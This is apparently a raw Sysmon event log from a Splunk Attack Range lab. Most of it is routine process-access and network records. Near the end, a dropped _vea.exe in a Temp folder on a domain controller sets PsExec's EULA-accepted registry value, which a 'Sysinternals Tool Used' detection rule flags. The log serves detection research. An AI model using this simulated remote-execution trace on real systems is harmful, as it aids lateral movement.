11:04:47.722{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219191Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:47.722{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219190Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:47.722{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-14CF-6216-BE04-000000003902}3232C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000219189Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:47.722{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219188Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:47.722{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-14CF-6216-BE04-000000003902}3232C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000219187Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:47.723{4F8D34B0-14CF-6216-BE04-000000003902}3232C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000219186Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:47.519{4F8D34B0-14CF-6216-BD04-000000003902}2268304C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219185Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:47.222{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-14CF-6216-BD04-000000003902}2268C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219184Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:47.222{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219183Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:47.222{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219182Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:47.222{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219181Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:47.222{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219180Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:47.222{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219179Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:47.222{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219178Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:47.222{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219177Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:47.222{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219176Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:47.222{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219175Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:47.222{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-14CF-6216-BD04-000000003902}2268C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000219174Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:47.222{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-14CF-6216-BD04-000000003902}2268C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000219173Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:47.223{4F8D34B0-14CF-6216-BD04-000000003902}2268C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000294985Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:48.432{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1AA33C84F49ECB465FD542CCC601929C,SHA256=B24A411D988D5C5890216D30122AB1A83114A0F8261800ADAEA07B1DFC7790B0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219203Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:48.222{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=262246EDA36AD2A50D41156751286E62,SHA256=55B7F7E142594BC372141BD0C27C10B76CA1BDB2ECC774DF69EB04BFB78EE528,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219202Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:48.097{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=784D3C0561CAE6930E3B363108E628AE,SHA256=85BDAF10480D47A75B85A240EFB4D9F884999654C081ACCCF3D62D50778D9CFB,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000219201Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:45.764{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51505-false10.0.1.12-8089- 354300x8000000000000000219200Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:45.319{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse187.141.52.101customer-187-141-52-101-sta.uninet-ide.com.mx55166-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 13241300x8000000000000000295010Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 11:04:49.945{C8EA50B7-14D1-6216-AC06-000000003802}7060C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000295009Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:49.841{C8EA50B7-F11F-6215-1000-000000003802}364764C:\Windows\system32\svchost.exe{C8EA50B7-14D1-6216-AD06-000000003802}7032C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295008Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:49.841{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-14D1-6216-AD06-000000003802}7032C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295007Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:49.819{C8EA50B7-14D1-6216-AD06-000000003802}70326784C:\Windows\system32\conhost.exe{C8EA50B7-14D1-6216-AC06-000000003802}7060C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295006Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:49.782{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-14D1-6216-AD06-000000003802}7032C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000295005Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:49.776{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-14D1-6216-AD06-000000003802}7032C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295004Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:49.652{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-14D1-6216-AC06-000000003802}7060C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000295003Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 